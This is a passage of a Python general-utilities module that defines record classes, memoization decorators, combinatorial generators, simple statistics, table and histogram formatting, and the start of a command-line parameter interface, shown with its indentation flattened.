raise AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
class Record(RecordWithoutPickling):
__slots__: List[str] = []
def __getstate__(self):
return {
key: getattr(self, key)
for key in self.__class__.fields
if hasattr(self, key)}
def __setstate__(self, valuedict):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
for key, value in valuedict.items():
fields.add(key)
setattr(self, key, value)
def __eq__(self, other):
return (self.__class__ == other.__class__
and self.__getstate__() == other.__getstate__())
def __ne__(self, other):
return not self.__eq__(other)
class ImmutableRecordWithoutPickling(RecordWithoutPickling):
"""Hashable record. Does not explicitly enforce immutability."""
def __init__(self, *args, **kwargs):
RecordWithoutPickling.__init__(self, *args, **kwargs)
self._cached_hash = None
def __hash__(self):
if self._cached_hash is None:
self._cached_hash = hash(
(type(self),) + tuple(getattr(self, field)
for field in self.__class__.fields))
return self._cached_hash
class ImmutableRecord(ImmutableRecordWithoutPickling, Record):
pass
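# A brief usage sketch for Record (illustrative; field names are made up):
#
#     class BoundaryCondition(Record):
#         pass
#
#     bc = BoundaryCondition(tag="inflow", value=3.0)
#     bc2 = bc.copy(value=5.0)   # new instance, all other fields carried over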
# }}}
class Reference:
def __init__(self, value):
self.value = value
def get(self):
from warnings import warn
warn("Reference.get() is deprecated -- use ref.value instead")
return self.value
def set(self, value):
self.value = value
class FakeList:
def __init__(self, f, length):
self._Length = length
self._Function = f
def __len__(self):
return self._Length
def __getitem__(self, index):
try:
return [self._Function(i)
for i in range(*index.indices(self._Length))]
except AttributeError:
return self._Function(index)
# {{{ dependent dictionary
class DependentDictionary:
def __init__(self, f, start=None):
if start is None:
start = {}
self._Function = f
self._Dictionary = start.copy()
def copy(self):
return DependentDictionary(self._Function, self._Dictionary)
def __contains__(self, key):
try:
self[key] # pylint: disable=pointless-statement
return True
except KeyError:
return False
def __getitem__(self, key):
try:
return self._Dictionary[key]
except KeyError:
return self._Function(self._Dictionary, key)
def __setitem__(self, key, value):
self._Dictionary[key] = value
def genuineKeys(self): # noqa
return list(self._Dictionary.keys())
def iteritems(self):
return self._Dictionary.items()
def iterkeys(self):
return self._Dictionary.keys()
def itervalues(self):
return self._Dictionary.values()
# }}}
# }}}
# {{{ assertive accessors
def one(iterable: Iterable[T]) -> T:
"""Return the first entry of *iterable*. Assert that *iterable* has only
that one entry.
"""
it = iter(iterable)
try:
v = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'one()'")
def no_more():
try:
next(it)
raise ValueError("iterable with more than one entry passed to 'one()'")
except StopIteration:
return True
assert no_more()
return v
def is_single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> bool:
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
all_equal = is_single_valued
def all_roughly_equal(iterable, threshold):
return is_single_valued(iterable,
equality_pred=lambda a, b: abs(a-b) < threshold)
def single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> T:
"""Return the first entry of *iterable*; Assert that other entries
are the same with the first entry of *iterable*.
"""
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
def others_same():
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
assert others_same()
return first_item
# }}}
# {{{ memoization / attribute storage
def memoize(*args: F, **kwargs: Any) -> F:
"""Stores previously computed function values in a cache.
Two keyword-only arguments are supported:
:arg use_kwargs: Allows the caller to use keyword arguments. Defaults to
``False``. Setting this to ``True`` has a non-negligible performance
impact.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
"""
use_kw = bool(kwargs.pop("use_kwargs", False))
default_key_func: Optional[Callable[..., Any]]
if use_kw:
def default_key_func(*inner_args, **inner_kwargs): # noqa pylint:disable=function-redefined
return inner_args, frozenset(inner_kwargs.items())
else:
default_key_func = None
key_func = kwargs.pop("key", default_key_func)
if kwargs:
raise TypeError(
"memoize received unexpected keyword arguments: {}".format(
", ".join(kwargs.keys())))
if key_func is not None:
def _decorator(func):
def wrapper(*args, **kwargs):
key = key_func(*args, **kwargs)
try:
return func._memoize_dic[key] # noqa: E501 # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args, **kwargs)
func._memoize_dic = {key: result} # noqa: E501 # pylint: disable=protected-access
return result
except KeyError:
result = func(*args, **kwargs)
func._memoize_dic[key] = result # noqa: E501 # pylint: disable=protected-access
return result
from functools import update_wrapper
update_wrapper(wrapper, func)
return wrapper
else:
def _decorator(func):
def wrapper(*args):
try:
return func._memoize_dic[args] # noqa: E501 # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args)
func._memoize_dic = {args: result} # noqa: E501 # pylint:disable=protected-access
return result
except KeyError:
result = func(*args)
func._memoize_dic[args] = result # noqa: E501 # pylint: disable=protected-access
return result
from functools import update_wrapper
update_wrapper(wrapper, func)
return wrapper
if not args:
return _decorator # type: ignore
if callable(args[0]) and len(args) == 1:
return _decorator(args[0])
raise TypeError(
f"memoize received unexpected position arguments: {args}")
FunctionValueCache = memoize
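# A brief usage sketch for memoize (illustrative):
#
#     @memoize
#     def fib(n):
#         return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#     fib(30)   # each distinct argument tuple is computed once, then served from the cache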
class _HasKwargs:
pass
def memoize_on_first_arg(function, cache_dict_name=None):
"""Like :func:`memoize_method`, but for functions that take the object
in which memoization information is stored as their first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
"""
if cache_dict_name is None:
cache_dict_name = intern(
f"_memoize_dic_{function.__module__}{function.__name__}"
)
def wrapper(obj, *args, **kwargs):
if kwargs:
key = (_HasKwargs, frozenset(kwargs.items())) + args
else:
key = args
try:
return getattr(obj, cache_dict_name)[key]
except AttributeError:
attribute_error = True
except KeyError:
attribute_error = False
result = function(obj, *args, **kwargs)
if attribute_error:
object.__setattr__(obj, cache_dict_name, {key: result})
return result
else:
getattr(obj, cache_dict_name)[key] = result
return result
def clear_cache(obj):
object.__delattr__(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
def memoize_method(method: F) -> F:
"""Supports cache deletion via ``method_name.clear_cache(self)``.
.. versionchanged:: 2021.2
Can memoize methods on classes that do not allow setting attributes
(e.g. by overwriting ``__setattr__``), e.g. frozen :mod:`dataclasses`.
"""
return memoize_on_first_arg(method,
intern(f"_memoize_dic_{method.__name__}"))
class keyed_memoize_on_first_arg: # noqa: N801
"""Like :func:`memoize_method`, but for functions that take the object
in which memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
:arg cache_dict_name: The name of the `dict` attribute in the instance
used to hold the cache.
.. versionadded :: 2020.3
"""
def __init__(self, key, cache_dict_name=None):
self.key = key
self.cache_dict_name = cache_dict_name
def _default_cache_dict_name(self, function):
return intern(f"_memoize_dic_{function.__module__}{function.__name__}")
def __call__(self, function):
cache_dict_name = self.cache_dict_name
key = self.key
if cache_dict_name is None:
cache_dict_name = self._default_cache_dict_name(function)
def wrapper(obj, *args, **kwargs):
cache_key = key(*args, **kwargs)
try:
return getattr(obj, cache_dict_name)[cache_key]
except AttributeError:
result = function(obj, *args, **kwargs)
object.__setattr__(obj, cache_dict_name, {cache_key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[cache_key] = result
return result
def clear_cache(obj):
object.__delattr__(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
class keyed_memoize_method(keyed_memoize_on_first_arg): # noqa: N801
"""Like :class:`memoize_method`, but additionally uses a function *key* to
compute the key under which the function result is stored.
Supports cache deletion via ``method_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
.. versionchanged:: 2021.2
Can memoize methods on classes that do not allow setting attributes
(e.g. by overwriting ``__setattr__``), e.g. frozen :mod:`dataclasses`.
"""
def _default_cache_dict_name(self, function):
return intern(f"_memoize_dic_{function.__name__}")
def memoize_method_with_uncached(uncached_args=None, uncached_kwargs=None):
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg uncached_args: a list of argument numbers
(0-based, not counting 'self' argument)
"""
from warnings import warn
warn("memoize_method_with_uncached is deprecated and will go away in 2022. "
"Use memoize_method_with_key instead",
DeprecationWarning,
stacklevel=2)
if uncached_args is None:
uncached_args = []
if uncached_kwargs is None:
uncached_kwargs = set()
# delete starting from the end
uncached_args = sorted(uncached_args, reverse=True)
uncached_kwargs = list(uncached_kwargs)
def parametrized_decorator(method):
cache_dict_name = intern(f"_memoize_dic_{method.__name__}")
def wrapper(self, *args, **kwargs):
cache_args = list(args)
cache_kwargs = kwargs.copy()
for i in uncached_args:
if i < len(cache_args):
cache_args.pop(i)
cache_args = tuple(cache_args)
if kwargs:
for name in uncached_kwargs:
cache_kwargs.pop(name, None)
key = (
(_HasKwargs, frozenset(cache_kwargs.items()))
+ cache_args)
else:
key = cache_args
try:
return getattr(self, cache_dict_name)[key]
except AttributeError:
result = method(self, *args, **kwargs)
object.__setattr__(self, cache_dict_name, {key: result})
return result
except KeyError:
result = method(self, *args, **kwargs)
getattr(self, cache_dict_name)[key] = result
return result
def clear_cache(self):
object.__delattr__(self, cache_dict_name)
if sys.version_info >= (2, 5):
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, method)
new_wrapper.clear_cache = clear_cache
return new_wrapper
return parametrized_decorator
class memoize_in: # noqa
"""Adds a cache to the function it decorates. The cache is attached
to *container* and must be uniquely specified by *identifier* (i.e.
all functions using the same *container* and *identifier* will be using
the same cache). The decorated function may only receive positional
arguments.
.. note::
This function works well on nested functions, which
do not have stable global identifiers.
.. versionchanged :: 2020.3
*identifier* no longer needs to be a :class:`str`,
but it needs to be hashable.
.. versionchanged:: 2021.2.1
Can now use instances of classes as *container* that do not allow
setting attributes (e.g. by overwriting ``__setattr__``),
e.g. frozen :mod:`dataclasses`.
"""
def __init__(self, container: Any, identifier: Hashable) -> None:
try:
memoize_in_dict = container._pytools_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
object.__setattr__(container, "_pytools_memoize_in_dict",
memoize_in_dict)
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
def __call__(self, inner: F) -> F:
@wraps(inner)
def new_inner(*args):
try:
return self.cache_dict[args]
except KeyError:
result = inner(*args)
self.cache_dict[args] = result
return result
# NOTE: mypy gets confused because it types `wraps` as
# Callable[[VarArg(Any)], Any]
# which, for some reason, is not compatible with `F`
return new_inner # type: ignore[return-value]
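# A brief usage sketch for memoize_in (illustrative; `container` is assumed to be an
# object that can carry attributes, e.g. a solver or context instance):
#
#     def compute(container, x):
#         @memoize_in(container, "expensive_helper")
#         def helper(n):
#             ...   # results cached per (container, identifier, args)
#         return helper(x)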
class keyed_memoize_in: # noqa
"""Like :class:`memoize_in`, but additionally uses a function *key* to
compute the key under which the function result is memoized.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2021.2.1
"""
def __init__(self, container, identifier, key):
try:
memoize_in_dict = container._pytools_keyed_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
object.__setattr__(container, "_pytools_keyed_memoize_in_dict",
memoize_in_dict)
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
self.key = key
def __call__(self, inner):
@wraps(inner)
def new_inner(*args):
key = self.key(*args)
try:
return self.cache_dict[key]
except KeyError:
result = inner(*args)
self.cache_dict[key] = result
return result
return new_inner
# }}}
# {{{ syntactical sugar
class InfixOperator:
"""Pseudo-infix operators that allow syntax of the kind `op1 <<operator>> op2'.
Following a recipe from
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/384122
"""
def __init__(self, function):
self.function = function
def __rlshift__(self, other):
return InfixOperator(lambda x: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def call(self, a, b):
return self.function(a, b)
def monkeypatch_method(cls):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def monkeypatch_class(_name, bases, namespace):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
assert len(bases) == 1, "Exactly one base class required"
base = bases[0]
for name, value in namespace.items():
if name != "__metaclass__":
setattr(base, name, value)
return base
# }}}
# {{{ generic utilities
def add_tuples(t1, t2):
return tuple([t1v + t2v for t1v, t2v in zip(t1, t2)])
def negate_tuple(t1):
return tuple([-t1v for t1v in t1])
def shift(vec, dist):
"""Return a copy of *vec* shifted by *dist* such that
.. code:: python
shift(a, i)[j] == a[(i+j) % len(a)]
"""
result = vec[:]
N = len(vec) # noqa
dist = dist % N
# modulo only returns positive distances!
if dist > 0:
result[dist:] = vec[:N-dist]
result[:dist] = vec[N-dist:]
return result
def len_iterable(iterable):
return sum(1 for i in iterable)
def flatten(iterable):
"""For an iterable of sub-iterables, generate each member of each
sub-iterable in turn, i.e. a flattened version of that super-iterable.
Example: Turn [[a,b,c],[d,e,f]] into [a,b,c,d,e,f].
"""
for sublist in iterable:
yield from sublist
def general_sum(sequence):
return reduce(operator.add, sequence)
def linear_combination(coefficients, vectors):
result = coefficients[0] * vectors[0]
for c, v in zip(coefficients[1:], vectors[1:]):
result += c*v
return result
def common_prefix(iterable, empty=None):
it = iter(iterable)
try:
pfx = next(it)
except StopIteration:
return empty
for v in it:
for j, pfx_j in enumerate(pfx):
if pfx_j != v[j]:
pfx = pfx[:j]
if j == 0:
return pfx
break
return pfx
def decorate(function, iterable):
return [(x, function(x)) for x in iterable]
def partition(criterion, iterable):
part_true = []
part_false = []
for i in iterable:
if criterion(i):
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def partition2(iterable):
part_true = []
part_false = []
for pred, i in iterable:
if pred:
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def product(iterable: Iterable[Any]) -> Any:
from operator import mul
return reduce(mul, iterable, 1)
def reverse_dictionary(the_dict):
result = {}
for key, value in the_dict.items():
if value in result:
raise RuntimeError(
f"non-reversible mapping, duplicate key '{value}'")
result[value] = key
return result
def set_sum(set_iterable):
from operator import or_
return reduce(or_, set_iterable, set())
def div_ceil(nr, dr):
return -(-nr // dr)
def uniform_interval_splitting(n, granularity, max_intervals):
""" Return *(interval_size, num_intervals)* such that::
num_intervals * interval_size >= n
and::
(num_intervals - 1) * interval_size < n
and *interval_size* is a multiple of *granularity*.
"""
# ported from Thrust
grains = div_ceil(n, granularity)
# one grain per interval
if grains <= max_intervals:
return granularity, grains
grains_per_interval = div_ceil(grains, max_intervals)
interval_size = grains_per_interval * granularity
num_intervals = div_ceil(n, interval_size)
return interval_size, num_intervals
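# Worked example: uniform_interval_splitting(100, granularity=8, max_intervals=4)
# gives grains=13 > 4, grains_per_interval=4, so interval_size=32 and num_intervals=4:
# 4*32 = 128 >= 100 and 3*32 = 96 < 100, with 32 a multiple of the granularity 8.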
def find_max_where(predicate, prec=1e-5, initial_guess=1, fail_bound=1e38):
"""Find the largest value for which a predicate is true,
along a half-line. 0 is assumed to be the lower bound."""
# {{{ establish bracket
mag = initial_guess
if predicate(mag):
mag *= 2
while predicate(mag):
mag *= 2
if mag > fail_bound:
raise RuntimeError("predicate appears to be true "
f"everywhere, up to {fail_bound:g}")
lower_true = mag/2
upper_false = mag
else:
mag /= 2
while not predicate(mag):
mag /= 2
if mag < prec:
return mag
lower_true = mag
upper_false = mag*2
# }}}
# {{{ refine
# Refine a bracket between *lower_true*, where the predicate is true,
# and *upper_false*, where it is false, until *prec* is satisfied.
assert predicate(lower_true)
assert not predicate(upper_false)
while abs(lower_true-upper_false) > prec:
mid = (lower_true+upper_false)/2
if predicate(mid):
lower_true = mid
else:
upper_false = mid
return lower_true
# }}}
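# e.g. find_max_where(lambda x: x*x < 100) converges to ~10 (within the default prec).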
# }}}
# {{{ argmin, argmax
def argmin2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmin, current_min = next(it)
except StopIteration:
raise ValueError("argmin of empty iterable")
for arg, item in it:
if item < current_min:
current_argmin = arg
current_min = item
if return_value:
return current_argmin, current_min
else:
return current_argmin
def argmax2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmax, current_max = next(it)
except StopIteration:
raise ValueError("argmax of empty iterable")
for arg, item in it:
if item > current_max:
current_argmax = arg
current_max = item
if return_value:
return current_argmax, current_max
else:
return current_argmax
def argmin(iterable):
return argmin2(enumerate(iterable))
def argmax(iterable):
return argmax2(enumerate(iterable))
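# e.g. argmin2([("a", 3), ("b", 1), ("c", 2)]) == "b";  argmin([3, 1, 2]) == 1 (the index).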
# }}}
# {{{ cartesian products etc.
def cartesian_product(*args):
if len(args) == 1:
for arg in args[0]:
yield (arg,)
return
first = args[:-1]
for prod in cartesian_product(*first):
for i in args[-1]:
yield prod + (i,)
def distinct_pairs(list1, list2):
for i, xi in enumerate(list1):
for j, yj in enumerate(list2):
if i != j:
yield (xi, yj)
def cartesian_product_sum(list1, list2):
"""This routine returns a list of sums of each element of
list1 with each element of list2. Also works with lists.
"""
for i in list1:
for j in list2:
yield i+j
# }}}
# {{{ elementary statistics
def average(iterable):
"""Return the average of the values in iterable.
iterable may not be empty.
"""
it = iterable.__iter__()
try:
s = next(it)
count = 1
except StopIteration:
raise ValueError("empty average")
for value in it:
s = s + value
count += 1
return s/count
class VarianceAggregator:
"""Online variance calculator.
See http://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Adheres to pysqlite's aggregate interface.
"""
def __init__(self, entire_pop):
self.n = 0
self.mean = 0
self.m2 = 0
self.entire_pop = entire_pop
def step(self, x):
self.n += 1
delta_ = x - self.mean
self.mean += delta_/self.n
self.m2 += delta_*(x - self.mean)
def finalize(self):
if self.entire_pop:
if self.n == 0:
return None
else:
return self.m2/self.n
else:
if self.n <= 1:
return None
else:
return self.m2/(self.n - 1)
def variance(iterable, entire_pop):
v_comp = VarianceAggregator(entire_pop)
for x in iterable:
v_comp.step(x)
return v_comp.finalize()
def std_deviation(iterable, finite_pop):
from math import sqrt
return sqrt(variance(iterable, finite_pop))
# }}}
# {{{ permutations, tuples, integer sequences
def wandering_element(length, wanderer=1, landscape=0):
for i in range(length):
yield i*(landscape,) + (wanderer,) + (length-1-i)*(landscape,)
def indices_in_shape(shape):
from warnings import warn
warn("indices_in_shape is deprecated. You should prefer numpy.ndindex.",
DeprecationWarning, stacklevel=2)
if isinstance(shape, int):
shape = (shape,)
if not shape:
yield ()
elif len(shape) == 1:
for i in range(0, shape[0]):
yield (i,)
else:
remainder = shape[1:]
for i in range(0, shape[0]):
for rest in indices_in_shape(remainder):
yield (i,)+rest
def generate_nonnegative_integer_tuples_below(n, length=None, least=0):
"""n may be a sequence, in which case length must be None."""
if length is None:
if not n:
yield ()
return
my_n = n[0]
n = n[1:]
next_length = None
else:
my_n = n
assert length >= 0
if length == 0:
yield ()
return
next_length = length-1
for i in range(least, my_n):
my_part = (i,)
for base in generate_nonnegative_integer_tuples_below(n, next_length, least):
yield my_part + base
def generate_decreasing_nonnegative_tuples_summing_to(
n, length, min_value=0, max_value=None):
if length == 0:
yield ()
elif length == 1:
if n <= max_value:
#print "MX", n, max_value
yield (n,)
else:
return
else:
if max_value is None or n < max_value:
max_value = n
for i in range(min_value, max_value+1):
#print "SIG", sig, i
for remainder in generate_decreasing_nonnegative_tuples_summing_to(
n-i, length-1, min_value, i):
yield (i,) + remainder
def generate_nonnegative_integer_tuples_summing_to_at_most(n, length):
"""Enumerate all non-negative integer tuples summing to at most n,
exhausting the search space by varying the first entry fastest,
and the last entry the slowest.
"""
assert length >= 0
if length == 0:
yield ()
else:
for i in range(n+1):
for remainder in generate_nonnegative_integer_tuples_summing_to_at_most(
n-i, length-1):
yield remainder + (i,)
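# e.g. list(generate_nonnegative_integer_tuples_summing_to_at_most(2, 2)) yields
# (0, 0), (1, 0), (2, 0), (0, 1), (1, 1), (0, 2) -- the first entry varies fastest.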
# backwards compatibility
generate_positive_integer_tuples_below = generate_nonnegative_integer_tuples_below
def _pos_and_neg_adaptor(tuple_iter):
for tup in tuple_iter:
nonzero_indices = [i for i in range(len(tup)) if tup[i] != 0]
for do_neg_tup in generate_nonnegative_integer_tuples_below(
2, len(nonzero_indices)):
this_result = list(tup)
for index, do_neg in enumerate(do_neg_tup):
if do_neg:
this_result[nonzero_indices[index]] *= -1
yield tuple(this_result)
def generate_all_integer_tuples_below(n, length, least_abs=0):
return _pos_and_neg_adaptor(generate_nonnegative_integer_tuples_below(
n, length, least_abs))
def generate_permutations(original):
"""Generate all permutations of the list *original*.
Nicked from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178
"""
if len(original) <= 1:
yield original
else:
for perm_ in generate_permutations(original[1:]):
for i in range(len(perm_)+1):
#nb str[0:1] works in both string and list contexts
yield perm_[:i] + original[0:1] + perm_[i:]
def generate_unique_permutations(original):
"""Generate all unique permutations of the list *original*.
"""
had_those = set()
for perm_ in generate_permutations(original):
if perm_ not in had_those:
had_those.add(perm_)
yield perm_
def enumerate_basic_directions(dimensions):
coordinate_list = [[0], [1], [-1]]
return reduce(cartesian_product_sum, [coordinate_list] * dimensions)[1:]
# }}}
# {{{ index mangling
def get_read_from_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *rfm* of indices such that
``permuted[i] == original[rfm[i]]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... rfm = get_read_from_map_from_permutation(p1, p2)
... p2a = [p1[rfm[i]] for i in range(len(p1))]
... assert p2 == p2a
"""
from warnings import warn
warn("get_read_from_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_original = {
original[i]: i for i in range(len(original))}
assert len(where_in_original) == len(original)
return tuple(where_in_original[pi] for pi in permuted)
def get_write_to_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *wtm* of indices such that
``permuted[wtm[i]] == original[i]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... wtm = get_write_to_map_from_permutation(p1, p2)
... p2a = [0] * len(p2)
... for i, oi in enumerate(p1):
... p2a[wtm[i]] = oi
... assert p2 == p2a
"""
from warnings import warn
warn("get_write_to_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_permuted = {
permuted[i]: i for i in range(len(permuted))}
assert len(where_in_permuted) == len(permuted)
return tuple(where_in_permuted[oi] for oi in original)
# }}}
# {{{ graph algorithms
from pytools.graph import a_star as a_star_moved
a_star = MovedFunctionDeprecationWrapper(a_star_moved)
# }}}
# {{{ formatting
# {{{ table formatting
class Table:
"""An ASCII table generator.
:arg alignments: List of alignments of each column ('l', 'c', or 'r',
for left, center, and right alignment, respectively). Columns which
have no alignment specifier will use the last specified alignment. For
example, with `alignments=['l', 'r']`, the third and all following
columns will use 'r' alignment.
.. automethod:: add_row
.. automethod:: __str__
.. automethod:: github_markdown
.. automethod:: csv
.. automethod:: latex
"""
def __init__(self, alignments=None):
self.rows = []
if alignments is not None:
self.alignments = alignments
else:
self.alignments = ["l"]
def add_row(self, row):
self.rows.append([str(i) for i in row])
def __str__(self):
"""
Returns a string representation of the table.
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl)
1 | |
---+------
10 | 20||
"""
columns = len(self.rows[0])
col_widths = [max(len(row[i]) for row in self.rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in self.rows]
lines[1:1] = ["+".join("-" * (col_width + 1 + (i > 0))
for i, col_width in enumerate(col_widths))]
return "\n".join(lines)
def github_markdown(self):
r"""Returns a string representation of the table formatted as
`GitHub-Flavored Markdown.
<https://docs.github.com/en/github/writing-on-github/organizing-information-with-tables>`__
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl.github_markdown())
1 | \|
:--|-------:
10 | 20\|\|
""" # noqa: W605
# Pipe symbols ('|') must be replaced
rows = [[w.replace("|", "\\|") for w in r] for r in self.rows]
columns = len(rows[0])
col_widths = [max(len(row[i]) for row in rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in rows]
lines[1:1] = ["|".join(
":" + "-" * (col_width - 1 + (i > 0)) + ":" if align == "c"
else ":" + "-" * (col_width + (i > 0)) if align == "l"
else "-" * (col_width + (i > 0)) + ":"
for i, (col_width, align) in enumerate(zip(col_widths, alignments)))]
return "\n".join(lines)
def csv(self, dialect="excel", csv_kwargs=None):
"""Returns a string containing a CSV representation of the table.
:arg dialect: String passed to :func:`csv.writer`.
:arg csv_kwargs: Dict of arguments passed to :func:`csv.writer`.
.. doctest ::
>>> tbl = Table()
>>> tbl.add_row([1, ","])
>>> tbl.add_row([10, 20])
>>> print(tbl.csv())
1,","
10,20
"""
import csv
import io
if csv_kwargs is None:
csv_kwargs = {}
# Default is "\r\n"
if "lineterminator" not in csv_kwargs:
csv_kwargs["lineterminator"] = "\n"
output = io.StringIO()
writer = csv.writer(output, dialect, **csv_kwargs)
writer.writerows(self.rows)
return output.getvalue().rstrip(csv_kwargs["lineterminator"])
def latex(self, skip_lines=0, hline_after=None):
r"""Returns a string containing the rows of a LaTeX representation of
the table.
:arg skip_lines: number of lines to skip at the start of the table.
:arg hline_after: list of row indices after which to add an ``hline``
(the indices are counted after the first *skip_lines* rows have been dropped).
.. doctest::
>>> tbl = Table()
>>> tbl.add_row([0, "skipped"])
>>> tbl.add_row([1, "apple"])
>>> tbl.add_row([2, "pear"])
>>> print(tbl.latex(skip_lines=1))
1 & apple \\
2 & pear \\
"""
if hline_after is None:
hline_after = []
lines = []
for row_nr, row in enumerate(self.rows[skip_lines:]):
lines.append(fr"{' & '.join(row)} \\")
if row_nr in hline_after:
lines.append(r"\hline")
return "\n".join(lines)
# }}}
# {{{ histogram formatting
def string_histogram( # pylint: disable=too-many-arguments,too-many-locals
iterable, min_value=None, max_value=None,
bin_count=20, width=70, bin_starts=None, use_unicode=True):
if bin_starts is None:
if min_value is None or max_value is None:
iterable = list(iterable)
min_value = min(iterable)
max_value = max(iterable)
bin_width = (max_value - min_value)/bin_count
bin_starts = [min_value+bin_width*i for i in range(bin_count)]
bins = [0 for i in range(len(bin_starts))]
from bisect import bisect
for value in iterable:
if (max_value is not None and value > max_value) or value < bin_starts[0]:
from warnings import warn
warn("string_histogram: out-of-bounds value ignored")
else:
bin_nr = bisect(bin_starts, value)-1
try:
bins[bin_nr] += 1
except Exception:
print(value, bin_nr, bin_starts)
raise
from math import floor, ceil
if use_unicode:
def format_bar(cnt):
scaled = cnt*width/max_count
full = int(floor(scaled))
eighths = int(ceil((scaled-full)*8))
if eighths:
return full*chr(0x2588) + chr(0x2588+(8-eighths))
else:
return full*chr(0x2588)
else:
def format_bar(cnt):
return int(ceil(cnt*width/max_count))*"#"
max_count = max(bins)
total_count = sum(bins)
return "\n".join("{:9g} |{:9d} | {:3.0f} % | {}".format(
bin_start,
bin_value,
bin_value/total_count*100,
format_bar(bin_value))
for bin_start, bin_value in zip(bin_starts, bins))
# }}}
def word_wrap(text, width, wrap_using="\n"):
# http://code.activestate.com/recipes/148061-one-liner-word-wrap-function/
r"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (``\n``).
"""
space_or_break = [" ", wrap_using]
return reduce(lambda line, word: "{}{}{}".format(
line,
space_or_break[(
len(line) - line.rfind("\n") - 1
+ len(word.split("\n", 1)[0])
) >= width],
word),
text.split(" ")
)
# }}}
# {{{ command line interfaces
def _exec_arg(arg, execenv):
import os
if os.access(arg, os.F_OK):
exec(compile(open(arg).read(), arg, "exec"), execenv)
else:
exec(compile(arg, "<command line>", "exec"), execenv)
class CPyUserInterface:
class Parameters(Record):
pass
def __init__(self, variables, constants=None, doc=None):
if constants is None:
constants = {}
if doc is None:
doc = {}
self.variables = variables
self.constants = constants
self.doc = doc
def show_usage(self, progname):
print(f"usage: {progname} <FILE-OR-STATEMENTS>")
print()
print("FILE-OR-STATEMENTS may either be Python statements of the form")
print("'variable1 = value1; variable2 = value2' or the name of a file")
print("containing such statements. Any valid Python code may be used")
print("on the command line or in a command file. If new variables are")
print("used, they must start with 'user_' or just '_'.")
print()
print("The following variables are recognized:")
for v in sorted(self.variables):
print(f" {v} = {self.variables[v]}")
if v in self.doc:
print(f" {self.doc[v]}")
print()
print("The following constants are supplied:")
for c in sorted(self.constants):
print(f" {c} = {self.constants[c]}")
if c in self.doc:
print(f" {self.doc[c]}")
def gather(self, argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1 or (
("-h" in argv)
